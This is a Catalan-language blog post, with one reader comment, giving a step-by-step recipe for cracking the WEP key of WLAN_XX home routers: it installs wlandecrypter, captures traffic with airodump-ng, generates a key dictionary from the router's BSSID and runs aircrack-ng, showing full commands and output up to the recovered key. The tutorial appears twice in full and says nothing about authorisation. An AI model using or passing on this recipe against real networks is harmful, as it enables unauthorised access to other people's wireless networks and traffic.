Crack wireless WLAN_XX WEP
Si teniu una red inalàmbrica que s'anomena WLAN_XX on XX és un valor hexadecimal (p.ex AB, 03, FF, CE..) us mostraré com crackejar-la en 5 minuts.
Lo primer, instal·lar es últims drivers o firmware de sa targeta inalàmbrica, especialment si és una Intel PRO 2200 amb mòdul ipw2200. Podeu provar-ho sense.
1. Instal·lar eines bàsiques que són: kismet, aircrack-ng, wlandecrypter.
Kismet i aircrack-ng es poden instal·lar des de synaptic o APT.
Wlandecrypter el podeu trobar a internet a: http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/5
o a Wlandecrypter-0.5.tar.gz
Només s'ha de descomprimir, compilar i instal·lar (amb super usuari):
sonydeb:/home/lipi/Desktop# tar xvzf Wlandecrypter-0.5.tar.gz
wlandecrypter-0.5/
wlandecrypter-0.5/Makefile
wlandecrypter-0.5/wlandecrypter.c
wlandecrypter-0.5/README.txt
onydeb:/home/lipi/Desktop# cd wlandecrypter-0.5/
sonydeb:/home/lipi/Desktop/wlandecrypter-0.5# make
gcc -g -O2 -D_FILE_OFFSET_BITS=64 wlandecrypter.c -o wlandecrypter
sonydeb:/home/lipi/Desktop/wlandecrypter-0.5# make install
install -d /usr/sbin
install -m 755 wlandecrypter /usr/sbin
sonydeb:/home/lipi/Desktop/wlandecrypter-0.5#
2. Cercar reds amb nom WLAN_XX i apuntar la seva BSSID, ho podeu fer amb Kismet; l'arrancau, pitjau S, triau "sort by bssid", us poseu damunt WLAN_XX amb les fletxes i pitjeu intro, obtindreu la informació de la red WLAN_XX i el BSSID. És important que tingui nombre de paquets, ho veureu a la pantalla principal del Kismet.
3. Executar el següent:
sonydeb:/home/lipi# airodump-ng --bssid 00:60:XX:FA:C1:XX -w captura eth2
On només us caldrà substituïr la BSSID, i eth2, on ethX és la vostra targeta de red inalambrica, (iwconfig des de superusuari per saber quina teniu).
Us sortirà:
CH 4 ][ Elapsed: 3 mins ][ 2007-04-15 19:18
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:60:XX:FA:C1:XX -1 178 29 0 8 54. WEP WEP WLAN_
BSSID STATION PWR Lost Packets Probes
00:60:B3:FA:C1:39 00:0E:8E:05:4A:90 -1 0 29
Quan hi hagi suficients paquets, (almenys 25), podeu aturar-ho amb CTRL+C.
4. Feu:
sonydeb:/home/lipi# wlandecrypter 00:60:XX:FA:C1:XX WLAN_FF diccionari
i us sortirà:
wlandecrypter 0.5 - (c) 2006 nilp0inter2k6_at_gmail.com
------------> http://www.rusoblanco.com <------------
[+] BSSID: 00:60:xx:FA:C1:xx
[+] Modelo: Z-com <-- Fixeu-vos que això és el model del Router!!
[+] ESSID: WLAN_FF
[+] Fichero de claves: diccionari
[+] Fichero guardado
5. Finalment:
sonydeb:/home/lipi# aircrack-ng -w diccionari captura-01.cap
Opening captura-01.cap
Read 523 packets.
# BSSID ESSID Encryption
1 00:60:XX:FA:C1:XX WLAN_FF WEP (29 IVs)
Choosing first network as target.
Aircrack-ng 0.6.2
[00:00:00] Tested 27140 keys (got 29 IVs)
KB depth byte(vote)
0 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
1 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
2 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
3 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
4 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
5 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
6 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
7 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
8 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
9 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
10 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
11 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
12 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
KEY FOUND! [ 5A:30:30:31:33:34:39:36:41:30:33:46:46 ] (ASCII: Z0013496A03FF )
Olé, aqui està! Z0013496A03FF
Fixeu-vos que Z es la primera lletra del model, i que FF les hexadecimal del nom, en aquest cas WLAN_FF.
1. Instal·lar eines bàsiques que són: kismet, aircrack-ng, wlandecrypter.
Kismet i aircrack-ng es poden instal·lar des de synaptic o APT.
Wlandecrypter el podeu trobar a internet a: http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/5
o a Wlandecrypter-0.5.tar.gz
Només s'ha de descomprimir, compilar i instal·lar (amb super usuari):
sonydeb:/home/lipi/Desktop# tar xvzf Wlandecrypter-0.5.tar.gz
wlandecrypter-0.5/
wlandecrypter-0.5/Makefile
wlandecrypter-0.5/wlandecrypter.c
wlandecrypter-0.5/README.txt
onydeb:/home/lipi/Desktop# cd wlandecrypter-0.5/
sonydeb:/home/lipi/Desktop/wlandecrypter-0.5# make
gcc -g -O2 -D_FILE_OFFSET_BITS=64 wlandecrypter.c -o wlandecrypter
sonydeb:/home/lipi/Desktop/wlandecrypter-0.5# make install
install -d /usr/sbin
install -m 755 wlandecrypter /usr/sbin
sonydeb:/home/lipi/Desktop/wlandecrypter-0.5#
2. Cercar reds amb nom WLAN_XX i apuntar la seva BSSID, ho podeu fer amb Kismet; l'arrancau, pitjau S, triau "sort by bssid", us poseu damunt WLAN_XX amb les fletxes i pitjeu intro, obtindreu la informació de la red WLAN_XX i el BSSID. És important que tingui nombre de paquets, ho veureu a la pantalla principal del Kismet.
3. Executar el següent:
sonydeb:/home/lipi# airodump-ng --bssid 00:60:XX:FA:C1:XX -w captura eth2
On només us caldrà substituïr la BSSID, i eth2, on ethX és la vostra targeta de red inalambrica, (iwconfig des de superusuari per saber quina teniu).
Us sortirà:
CH 4 ][ Elapsed: 3 mins ][ 2007-04-15 19:18
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:60:XX:FA:C1:XX -1 178 29 0 8 54. WEP WEP WLAN_
BSSID STATION PWR Lost Packets Probes
00:60:B3:FA:C1:39 00:0E:8E:05:4A:90 -1 0 29
Quan hi hagi suficients paquets, (almenys 25), podeu aturar-ho amb CTRL+C.
4. Feu:
sonydeb:/home/lipi# wlandecrypter 00:60:XX:FA:C1:XX WLAN_FF diccionari
i us sortirà:
wlandecrypter 0.5 - (c) 2006 nilp0inter2k6_at_gmail.com
------------> http://www.rusoblanco.com <------------
[+] BSSID: 00:60:xx:FA:C1:xx
[+] Modelo: Z-com <-- Fixeu-vos que això és el model del Router!!
[+] ESSID: WLAN_FF
[+] Fichero de claves: diccionari
[+] Fichero guardado
5. Finalment:
sonydeb:/home/lipi# aircrack-ng -w diccionari captura-01.cap
Opening captura-01.cap
Read 523 packets.
# BSSID ESSID Encryption
1 00:60:XX:FA:C1:XX WLAN_FF WEP (29 IVs)
Choosing first network as target.
Aircrack-ng 0.6.2
[00:00:00] Tested 27140 keys (got 29 IVs)
KB depth byte(vote)
0 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
1 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
2 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
3 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
4 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
5 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
6 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
7 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
8 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
9 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
10 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
11 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
12 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
KEY FOUND! [ 5A:30:30:31:33:34:39:36:41:30:33:46:46 ] (ASCII: Z0013496A03FF )
Olé, aqui està! Z0013496A03FF
Fixeu-vos que Z es la primera lletra del model, i que FF les hexadecimal del nom, en aquest cas WLAN_FF.
1 comentario:
No hi ha permisos suficients per descarregar l'wlandecrypter del teu perfil de la FIB (o ja l'has tret) :/
Publicar un comentario